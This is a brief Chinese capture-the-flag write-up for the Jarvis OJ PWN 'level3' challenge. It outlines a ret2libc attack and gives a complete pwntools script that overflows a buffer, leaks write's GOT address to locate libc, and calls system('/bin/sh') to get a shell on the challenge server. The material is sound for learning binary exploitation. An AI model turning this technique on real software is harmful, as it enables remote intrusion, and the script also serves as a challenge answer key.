jarvis oj PWN - level3
阿新 • • 發佈:2021-08-02
思路:
1.使用write 洩漏出 got地址, 通過libc計算偏移得到system, binsh
2.覆蓋ebp返回主函式再次執行
3.這次覆蓋ebp執行system /bin/sh。
關鍵傳參: write_addr, 返回地址, 1, output, 4(4位元組)
from pwn import * is_debug = False # is_debug = True # context(log_level='debug', arch='i386', os='linux') io = remote("pwn2.jarvisoj.com", 9879) # io = process('level3') if is_debug: gdb.attach(io, ''' b *0x08048483 ''') e = ELF('level3') main_addr = e.symbols['vulnerable_function'] write_plt = e.symbols['write'] write_got = e.got['write'] # libc = ELF('/lib/i386-linux-gnu/libc.so.6') libc = ELF('libc-2.19.so') libc_write = libc.symbols['write'] junk = (0x88 + 4) * b'a' payload1 = flat(junk, write_plt, main_addr, 1, write_got, 4) r = io.recvline() print('recv is ', r) io.sendline(payload1) addr = io.recv()[:4] true_address = u32(addr) offset = true_address - libc_write system = libc.symbols['system'] + offset sh_addr = libc.search(b'/bin/sh').__next__() + offset payload2 = flat(junk, system, 1, sh_addr) io.sendline(payload2) io.interactive()